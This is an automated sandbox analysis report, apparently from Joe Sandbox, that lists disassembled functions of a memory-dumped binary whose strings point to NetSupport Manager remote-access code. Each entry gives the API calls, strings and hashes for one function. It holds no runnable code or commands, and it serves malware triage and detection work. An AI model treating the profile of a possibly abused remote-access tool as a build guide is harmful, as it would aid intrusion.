                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 180989782-0
                                                                                      • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                      • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                      • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                      • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                      Function 110B3090 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$EventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2857295742-0
                                                                                      • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                      • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                      Function 110770E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                        • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                      • EqualRect.USER32(?,?), ref: 1107713C
                                                                                      • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                      • m_hWnd, xrefs: 11077177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$DeferEqualPointsRect
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2754115966-2830328467
                                                                                      • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                      • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                      Function 11089150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                      • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLock
                                                                                      • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                      • API String ID: 2752051264-327499879
                                                                                      • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                      • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                      Function 11143110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                      • _strrchr.LIBCMT ref: 1114315A
                                                                                      • _strrchr.LIBCMT ref: 1114316A
                                                                                      • wsprintfA.USER32 ref: 11143185
                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                      • String ID: BILD
                                                                                      • API String ID: 2529650285-1114602597
                                                                                      • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                      • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                      • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                      • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                      Function 11065340 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                      • _memmove.LIBCMT ref: 110653B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProfileString_memmove
                                                                                      • String ID: Device$No default printer,,LPT1:$Windows
                                                                                      • API String ID: 1665476579-2460060945
                                                                                      • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                      • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                      • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                      • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                      Function 110450BD Relevance: 7.9, APIs: 5, Instructions: 401COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                      • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                      • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                      • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                      Function 11045160 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                      • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                      • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                      • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                      Function 11021300 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$VisibleWindow
                                                                                      • String ID: %d,%d,%d,%d,%d,%d
                                                                                      • API String ID: 1671172596-1913222166
                                                                                      • Opcode ID: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                      • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                      • Opcode Fuzzy Hash: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                      • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                      Function 11117000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$DeleteObject
                                                                                      • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                      • API String ID: 3011517232-3209293507
                                                                                      • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                      • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                      • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                      • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                      Function 110D1090 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memmove.LIBCMT ref: 110D1128
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                      • API String ID: 1528188558-323366856
                                                                                      • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                      • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                      • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                      • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                      Function 110B91D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
